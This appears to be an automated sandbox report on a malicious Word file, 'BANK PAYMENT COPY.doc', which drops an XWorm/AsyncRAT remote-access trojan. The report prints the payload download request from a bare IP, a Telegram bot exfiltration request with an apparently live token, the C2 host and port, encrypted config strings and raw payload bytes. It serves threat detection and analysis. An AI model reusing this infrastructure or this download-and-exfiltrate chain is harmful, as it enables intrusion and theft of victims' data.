                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 192.168.2.22:49163 -> 66.63.187.123:80
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163
                Source: global trafficTCP traffic: 66.63.187.123:80 -> 192.168.2.22:49163

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.22:49173 -> 147.185.221.22:55202
                Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.123:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.123:80 -> 192.168.2.22:49163
                Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.22:49164 -> 149.154.167.220:443
                Source: Malware configuration extractorURLs: various-wages.gl.at.ply.gg
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.22:49165 -> 147.185.221.22:55202
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.26.2Date: Wed, 25 Sep 2024 06:30:00 GMTContent-Type: application/x-msdos-programContent-Length: 434176Connection: keep-aliveLast-Modified: Tue, 24 Sep 2024 14:41:49 GMTETag: "6a000-622de8165b3ca"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 99 75 7b be 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 96 06 00 00 08 00 00 00 00 00 00 66 b5 06 00 00 20 00 00 00 c0 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 07 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 12 b5 06 00 4f 00 00 00 00 c0 06 00 a4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 0c 00 00 00 b4 a3 06 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 95 06 00 00 20 00 00 00 96 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a4 05 00 00 00 c0 06 00 00 06 00 00 00 98 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 06 00 00 02 00 00 00 9e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 46 b5 06 00 00 00 00 00 48 00 00 00 02 00 05 00 b8 3b 00 00 4c 2b 00 00 03 00 00 00 2d 00 00 06 04 67 00 00 b0 3c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b6 02 73 14 00 00 0a 7d 01 00 00 04 02 73 15 00 00 0a 7d 02 00 00 04 02 14 7d 04 00 00 04 02 28 16 00 00 0a 00 00 02 28 11 00 00 06 00 2a 00 00 13 30 02 00 43 00 00 00 01 00 00 11 00 72 01 00 00 70 28 17 00 00 0a 0a 00 06 0b 16 0c 2b 29 07 08 9a 0d 00 02 7b 01 00 00 04 09 6f 18 00 00 0a 00 02 7b 05 00 00 04 6f 19 00 00 0a 09 6f 1a 00 00 0a 26 00 08 17 58 0c 08 07 8e 69 32 d1 2a 00 13 30 01 00 08 00 00 00 02 00 00 11 00 72 1f 00 00 70 0a 2a 1b 30 05 00 8f 00 00 00 03 00 00 11 00 02 7b 08 00 00 04 6f 1b 00 00 0a 0a 02 7b 07 00 00 04 6f 1b 00 00 0a 0b 02 7b 09 00 00 04 6f 1b 00 00 0a 0c 02 7b 0a 00 00 04 6f 1b 00 00 0a 0d 02 7b 05 00 00 04 6f 1c 00 00 0a 13 04 02 7b 01 00 00 04 11 04 28 01 00 00 2b 13 05 06 28 1e 00 00 0a 07 6f 1f 00 00 0a 08 28 1e 00 00 0a 09 28 20 00 00 0a 11 04 73 2a 00 00 06 13 06 00 02 11 06 28 03 00 00 06 00 00 de 13 13 07 00 11 07 6f 21 00 00 0a 28 22 00 00 0a 26 00 de 00 2a 00 01 10 00 00 00 00 6e 00 0d 7b 00 13 1a
                Source: global trafficHTTP traffic detected: GET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A04B2031D7209871FB96E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%207%20Professional%20%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Standard%20VGA%20Graphics%20Adapter%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 147.185.221.22 147.185.221.22
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
                Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                Source: Joe Sandbox ViewJA3 fingerprint: 36f7277af969a6947a61ae0b815907a1
                Source: global trafficHTTP traffic detected: GET /txt/vnobizxc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: unknownTCP traffic detected without corresponding DNS query: 66.63.187.123
                Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{CB9F8585-EDEB-411F-9879-C99487259434}.tmpJump to behavior
                Source: global trafficHTTP traffic detected: GET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A04B2031D7209871FB96E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%207%20Professional%20%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Standard%20VGA%20Graphics%20Adapter%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /txt/vnobizxc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 66.63.187.123Connection: Keep-Alive
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: various-wages.gl.at.ply.gg
                Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/vnobizxc.exe
                Source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/vnobizxc.exeb:
                Source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/vnobizxc.exej
                Source: EQNEDT32.EXE, 00000002.00000002.420099253.000000000028F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/vnobizxc.exemmC:
                Source: EQNEDT32.EXE, 00000002.00000002.420099253.00000000002ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://66.63.187.123/txt/vnobizxc.exeoC:
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005CA6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: obibingf24242.exe, 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.937469127.0000000002651000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: obibingf24242.exe, 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.937469127.0000000002651000.00000004.00000800.00020000.00000000.sdmp, obibingf24242.exe, 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: obibingf24242.exe, 00000007.00000002.938006321.0000000005C77000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49164 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Source: initial sampleStatic file information: Filename: BANK PAYMENT COPY.doc
                Source: BANK PAYMENT COPY.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obibingf24242.exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\vnobizxc[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_002105045_2_00210504
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_0021E8C05_2_0021E8C0
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_0021B0B85_2_0021B0B8
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_002111B05_2_002111B0
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_0021B4F05_2_0021B4F0
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_002147A85_2_002147A8
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_0021C8E85_2_0021C8E8
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_0021B9285_2_0021B928
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_0021BE105_2_0021BE10
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_00213EE85_2_00213EE8
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 5_2_00212F505_2_00212F50
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 7_2_001C58C07_2_001C58C0
                Source: C:\Users\user\AppData\Roaming\obibingf24242.exeCode function: 7_2_001C4FF07_2_001C4FF0
                Source: BANK PAYMENT COPY.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 7.2.obibingf24242.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.obibingf24242.exe.265b624.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.obibingf24242.exe.2665904.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000007.00000002.936932565.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000005.00000002.427670214.0000000002651000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: vnobizxc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: obibingf24242.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.obibingf24242.exe.2665904.6.raw.unpack, Settings.csBase64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
                Source: 5.2.obibingf24242.exe.265b624.3.raw.unpack, Settings.csBase64 encoded string: 'jnxDCgaTMcMwYhKdiA0/tKI8/Kg/cnn8GHJWZDKEh0okrDm+mNQ2A54NeeFeivwu', 'L0+anQz0xL4RJfOh6xkSyVpKsrstIjy+9VAEvWldBMgNh4coKLQIfFbJKAtiWawL', 'm6aTSUtqKTZEVViuXc98ZpgQUptgC/4Z08GdDnEjSZygd3cs9h6PtA8rplIslDg/'
                Source: 5.2.obibingf24242.exe.3796750.8.raw.unpack, YqOlYl2eFwtfPkt21E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obibingf24242.exe.f30000.1.raw.unpack, YqOlYl2eFwtfPkt21E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, YqOlYl2eFwtfPkt21E.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 5.2.obibingf24242.exe.37e2170.7.raw.unpack, D0OGH51qG7TrJUYkAK.csSecurity API names: _0020.SetAccessControl
